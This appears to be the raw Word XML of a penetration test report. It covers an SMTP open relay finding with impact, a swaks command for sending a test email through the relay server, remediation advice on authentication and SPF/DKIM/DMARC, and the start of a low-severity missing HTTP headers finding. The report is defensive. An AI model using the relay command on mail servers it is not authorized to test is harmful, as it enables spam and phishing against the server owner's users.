                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0FC1C6D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DFAF347" w14:textId="3B39C72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6B09996" w14:textId="480269AF">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615526C9" w14:textId="52024AF7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2FF11029" w:rsidP="0D325B6E" w:rsidRDefault="2FF11029" w14:paraId="358D5338" w14:textId="0AD64183">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6BA9083" w:rsidP="0D325B6E" w:rsidRDefault="56BA9083" w14:paraId="0A0E7F5C" w14:textId="19E635F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BA9083">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The SMTP server allows for unauthorized email transmission, allowing attackers to send targeted spam or </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="04A8854D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="56BA9083">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">phishing emails to ATP </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="232EADA6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>employees and customers</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="092B6FEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the SMTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6022B6CE" w14:textId="68F3D0A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FF11029" w:rsidP="0D325B6E" w:rsidRDefault="2FF11029" w14:paraId="3341365F" w14:textId="1493AA15">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804F585" w:rsidP="0D325B6E" w:rsidRDefault="7804F585" w14:paraId="385919C4" w14:textId="3507D610">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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804F585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3CC0F69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804F585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerability compromises email system integrity and allows the attacker to potentially phish for sensitive information or credentials through a targeted phishing campaign.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="437DF722">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker can send out massive amounts of spam or malicious phishing emails</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="53B7E013">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, getting the IP to be blacklisted due to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="53B7E013">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>high amounts</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="53B7E013">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of malicious or spam traffic seen from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="409B0AAC" w14:textId="08EF320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FF11029" w:rsidP="0D325B6E" w:rsidRDefault="2FF11029" w14:paraId="1C6D33E9" w14:textId="3AF459E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9091571" w:rsidP="0D325B6E" w:rsidRDefault="69091571" w14:paraId="0DAD2795" w14:textId="106546D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>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9091571">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="69091571">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>swaks</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="69091571">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and run </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swaks</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 xml:space="preserve"> –f </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 xml:space="preserve"> –t </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 xml:space="preserve"> –d email.eml -s 10.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B64BFFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.0.0:25 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2F52A9ED" w14:textId="51EA60B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="72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5487F66A" w14:textId="67B8EE89">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2FF11029" w:rsidP="0D325B6E" w:rsidRDefault="2FF11029" w14:paraId="4393A070" w14:textId="6FA52B49">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FF11029" w:rsidP="0D325B6E" w:rsidRDefault="2FF11029" w14:paraId="52B979D8" w14:textId="22CEF1D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FF11029">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3E9C976F" w:rsidP="0D325B6E" w:rsidRDefault="3E9C976F" w14:paraId="7C271793" w14:textId="67EA9BE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>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E9C976F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configure the SMTP server to disable open relay functionality, including setting up proper authentication for email senders</w:t>
      </w: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 xml:space="preserve"> and restricting the list of IP addresses </w:t>
      </w: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allowed</w:t>
      </w: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 xml:space="preserve"> to relay emails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D534078" w:rsidP="0D325B6E" w:rsidRDefault="0D534078" w14:paraId="1841812C" w14:textId="43A1C34A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:num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additional</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D534078">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> email security measures such as SPF (Sender Policy Framework), DKIM (Domain Keys Identified Mail), and DMARC (Domain-based Message </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4E93C557">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication, Reporting, and Conformance) to prevent email spoofing and ensure email authenticity. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7590AE5D" w14:textId="1456277E">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FF11029" w:rsidP="0D325B6E" w:rsidRDefault="2FF11029" w14:paraId="16211828" w14:textId="6AE93068">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F11029">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663AAE8D" w:rsidP="0D325B6E" w:rsidRDefault="663AAE8D" w14:paraId="203384FC" w14:textId="24A3C167">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R232990f9694d4620">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="663AAE8D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>DuoCircle - SMTP Open Relay Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="243763BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A811F94" w:rsidP="0D325B6E" w:rsidRDefault="6A811F94" w14:paraId="168214C8" w14:textId="76F07F5B">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rc4798c3423514776">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="6A811F94">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Higherlogic - SPF, DKIM, DMARC Email Authentication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="243763BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5A7E5274" w14:textId="501058FF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7705B7E0" w14:textId="29A873EE">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="427D5D27" w14:textId="6BB2A065">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="72A63C0C" w14:textId="335897F6">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="53C496BC" w14:textId="437B7AEF">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3A5DFDFE" w14:textId="56F76C29">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6AEC3FA2" w14:textId="72FE5C0C">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="45697456" w14:textId="012EDD67">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6A6FEB95" w14:textId="79DE2BD8">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="472D1073" w14:textId="0BCE052C">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0E10C44A" w14:textId="4AEF25FF">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="510913BA" w14:textId="1563E66F">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6923D495" w14:textId="2A5C3432">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2D581742" w14:textId="03BB596F">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="142EEF48" w14:textId="45086407">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1C95C476" w14:textId="2C28DBF7">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5DE157E6" w14:textId="29BD6EEB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="14C700E1" w14:textId="2A946DB9">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5CE6B94E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94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Missing HTTP security headers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75"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="40CF00E4">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8451359" w14:textId="3857D67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4B6114" w14:textId="130C641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F5A844A" w14:textId="70792B6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1A926084">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0B751AD" w14:textId="6C1C430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41A16ED9" w14:textId="1366742C">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602920C" w14:textId="3DA9DEF5">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514355B" w14:textId="142375F9">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296C8AE7">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E39399" w14:textId="1949EEC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FEAB1F6" w14:textId="4B21ECA7">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Low</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18E4E5FC"/>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881615C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="69096EB6">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DA4799B" w14:textId="6E49E1F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956A777" w14:textId="169EC5DE">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="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strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
